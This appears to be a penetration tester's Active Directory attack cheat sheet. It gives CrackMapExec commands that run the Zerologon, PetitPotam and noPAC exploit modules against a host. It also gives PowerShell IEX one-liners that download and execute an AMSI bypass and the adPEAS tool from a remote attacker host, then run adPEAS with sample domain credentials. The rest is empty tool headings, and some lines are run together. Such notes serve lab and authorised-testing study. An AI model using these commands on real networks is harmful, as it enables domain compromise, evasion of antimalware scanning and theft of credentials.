AD Attack Recon
Enumeration Tools
CrackMapExec
# Zerologon
crackmapexec smb $RHOST -u '' -p '' -M zerologon
# PetitPotam
crackmapexec smb $RHOST -u '' -p '' -M petitpotam
# noPAC
crackmapexec smb $RHOST -u 'user' -p 'pass' -M nopa
# You need a credential for this oneadPEAS
# You need a credential to run adPEAS.
# Bypass ASMI
IEX (new-Object Net.WebClient).DownloadString('http://10.0.0.181/privesc/amsi.txt')
IEX (new-Object Net.WebClient).DownloadString('http://10.0.0.181/privesc/my-am-bypass.ps1')
# Import adPEAS
IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.181/privesc/adPEAS.ps1')
# Run the adPEAS
Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com' -Username 'contoso\johndoe' -Password 'Passw0rd1!' -Force
# gMSA account (service account such as svc_apache$)
Invoke-adPEAS -Domain 'heist.offsec' -Server 'dc01.heist.offsec' -Username 'heist.offsec\enox' -Password 'california' -Force -Module CredsCertipy
Certipy is an offensive tool for enumerating and abusing Active Directory Certificate Services (AD CS)
Bloodhound
Server side
Client side
Invoke-AdEnum
PowerUpSQL
Pyverview
Last updated